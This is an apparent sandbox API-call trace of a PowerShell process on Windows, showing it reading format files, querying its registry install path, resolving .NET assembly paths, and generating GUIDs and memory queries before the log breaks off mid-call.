[0062.304] ReadFile (in: hFile=0x308, lpBuffer=0x34e54e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34e54e8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.304] ReadFile (in: hFile=0x308, lpBuffer=0x34e54e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34e54e8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.305] ReadFile (in: hFile=0x308, lpBuffer=0x34e54e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34e54e8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.305] ReadFile (in: hFile=0x308, lpBuffer=0x34e54e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34e54e8*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.306] ReadFile (in: hFile=0x308, lpBuffer=0x34e54e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34e54e8*, lpNumberOfBytesRead=0x24d238*=0xfb2, lpOverlapped=0x0) returned 1 [0062.306] ReadFile (in: hFile=0x308, lpBuffer=0x34e4c02, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34e4c02*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.306] ReadFile (in: hFile=0x308, lpBuffer=0x34e54e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x34e54e8*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.306] CloseHandle (hObject=0x308) returned 1 [0062.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0062.306] SetErrorMode (uMode=0x1) returned 0x1 [0062.306] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1e0 | out: lpFileInformation=0x24d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0062.307] SetErrorMode (uMode=0x1) returned 0x1 [0062.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0062.307] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x308) returned 0x0 [0062.307] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0 [0062.307] CoTaskMemAlloc (cb=0x5a) returned 0x157010 [0062.307] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x157010, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0 [0062.307] CoTaskMemFree (pv=0x157010) [0062.307] RegCloseKey (hKey=0x308) returned 0x0 [0062.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0062.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0062.309] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x97193adb, Data2=0x3a3e, Data3=0x4db8, Data4=([0]=0xaa, [1]=0x12, [2]=0xfb, [3]=0x8a, [4]=0xaa, [5]=0x49, [6]=0x65, [7]=0x1e))) returned 0x0 [0062.314] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x7d3c7076, Data2=0xf590, Data3=0x4e3a, Data4=([0]=0x81, [1]=0xac, [2]=0xfc, [3]=0x7, [4]=0xdc, [5]=0x82, [6]=0x3e, [7]=0x9f))) returned 0x0 [0062.316] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xddfaaff1, Data2=0x808e, Data3=0x4bdd, Data4=([0]=0x81, [1]=0x8e, [2]=0xc2, [3]=0xba, [4]=0xf5, [5]=0x1d, [6]=0xf2, [7]=0x36))) returned 0x0 [0062.316] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x47f4cb98, Data2=0xea30, Data3=0x4ce7, Data4=([0]=0x87, [1]=0xa6, [2]=0x3, [3]=0x9f, [4]=0xc5, [5]=0xec, [6]=0xce, [7]=0xe3))) returned 0x0 [0062.317] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x34de99ab, Data2=0x355d, Data3=0x46d1, Data4=([0]=0x83, [1]=0x22, [2]=0x14, [3]=0xed, [4]=0x49, [5]=0xa8, [6]=0x37, [7]=0x7f))) returned 0x0 [0062.317] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x431c5ee0, Data2=0x7b0, Data3=0x45ef, Data4=([0]=0xab, [1]=0x1d, [2]=0x13, [3]=0x40, [4]=0xfe, [5]=0xa, [6]=0xa7, [7]=0x43))) returned 0x0 [0062.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.317] SetErrorMode (uMode=0x1) returned 0x1 [0062.317] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0062.317] GetFileType (hFile=0x308) returned 0x1 [0062.318] SetErrorMode (uMode=0x1) returned 0x1 [0062.318] GetFileType (hFile=0x308) returned 0x1 [0062.318] ReadFile (in: hFile=0x308, lpBuffer=0x3531248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3531248*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.321] ReadFile (in: hFile=0x308, lpBuffer=0x3531248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3531248*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.321] ReadFile (in: hFile=0x308, lpBuffer=0x3531248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3531248*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.321] ReadFile (in: hFile=0x308, lpBuffer=0x3531248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3531248*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.322] ReadFile (in: hFile=0x308, lpBuffer=0x3531248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3531248*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.322] ReadFile (in: hFile=0x308, lpBuffer=0x3531248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3531248*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1 [0062.323] ReadFile (in: hFile=0x308, lpBuffer=0x3531248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3531248*, lpNumberOfBytesRead=0x24d238*=0xaca, lpOverlapped=0x0) returned 1 [0062.323] ReadFile (in: hFile=0x308, lpBuffer=0x353087a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x353087a*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.323] ReadFile (in: hFile=0x308, lpBuffer=0x3531248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x3531248*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1 [0062.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.324] SetErrorMode (uMode=0x1) returned 0x1 [0062.324] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d1e0 | out: lpFileInformation=0x24d1e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0062.324] SetErrorMode (uMode=0x1) returned 0x1 [0062.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.324] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x308) returned 0x0 [0062.324] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0 [0062.324] CoTaskMemAlloc (cb=0x5a) returned 0x157010 [0062.324] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x157010, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0 [0062.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0062.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0062.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0062.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0062.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0062.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0062.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0062.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0062.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0062.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0062.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0062.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0062.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0062.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0062.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0062.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0062.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0062.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0062.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0062.439] VirtualQuery (in: lpAddress=0x24bd60, lpBuffer=0x24cc20, dwLength=0x30 | out: lpBuffer=0x24cc20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.440] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x8f293405, Data2=0x82f6, Data3=0x4f61, Data4=([0]=0xa8, [1]=0x47, [2]=0x6c, [3]=0x4e, [4]=0xf8, [5]=0x49, [6]=0x8f, [7]=0xc4))) returned 0x0 [0062.441] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x5fd40a7c, Data2=0x78bf, Data3=0x421d, Data4=([0]=0xb8, [1]=0x3, [2]=0x5f, [3]=0x22, [4]=0x19, [5]=0x47, [6]=0xb5, [7]=0x2))) returned 0x0 [0062.442] VirtualQuery (in: lpAddress=0x24bf10, lpBuffer=0x24cdd0, dwLength=0x30 | out: lpBuffer=0x24cdd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.443] VirtualQuery (in: lpAddress=0x24bf10, lpBuffer=0x24cdd0, dwLength=0x30 | out: lpBuffer=0x24cdd0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.444] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x4bd88d3c, Data2=0xfb88, Data3=0x468b, Data4=([0]=0xab, [1]=0x22, [2]=0x58, [3]=0x73, [4]=0x2d, [5]=0x77, [6]=0x6a, [7]=0xd0))) returned 0x0 [0062.447] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x69e5a752, Data2=0x8c94, Data3=0x44cb, Data4=([0]=0xa1, [1]=0x71, [2]=0xe7, [3]=0x87, [4]=0x80, [5]=0xa3, [6]=0x77, [7]=0x93))) returned 0x0 [0062.447] VirtualQuery (in: lpAddress=0x24c160, lpBuffer=0x24d020, dwLength=0x30 | out: lpBuffer=0x24d020*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.448] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.449] VirtualQuery (in: lpAddress=0x24bea0, lpBuffer=0x24cd60, dwLength=0x30 | out: lpBuffer=0x24cd60*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.449] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x1f1b5443, Data2=0x6cc4, Data3=0x4d13, Data4=([0]=0x9b, [1]=0xec, [2]=0xa9, [3]=0x26, [4]=0xd4, [5]=0xd5, [6]=0xf3, [7]=0xff))) returned 0x0 [0062.449] VirtualQuery (in: lpAddress=0x24c160, lpBuffer=0x24d020, dwLength=0x30 | out: lpBuffer=0x24d020*(BaseAddress=0x24c000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.450] VirtualQuery (in: lpAddress=0x24bf80, lpBuffer=0x24ce40, dwLength=0x30 | out: lpBuffer=0x24ce40*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.450] VirtualQuery (in: lpAddress=0x24b7d0, lpBuffer=0x24c690, dwLength=0x30 | out: lpBuffer=0x24c690*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.450] VirtualQuery (in: lpAddress=0x24b7d0, lpBuffer=0x24c690, dwLength=0x30 | out: lpBuffer=0x24c690*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0062.451] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xa642d7aa, Data2=0xc6c3, Data3=0x4ab8, Data4=([0]=0x9f, [1]=0x8d, [2]=0xf2, [3]=0xf6, [4]=0x2, [5]=0x6c, [6]=0xc1, [7]=0xb9))) returned 0x0 [0062.451] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xd94ab6f1, Data2=0xfb58, Data3=0x4307, Data4=([0]=0xa9, [1]=0xac, [2]=0x32, [3]=0xa6, [4]=0xdf, [5]=0x32, [6]=0xba, [7]=0xa9))) returned 0x0 [0062.452] GetFullPathNameW (in: 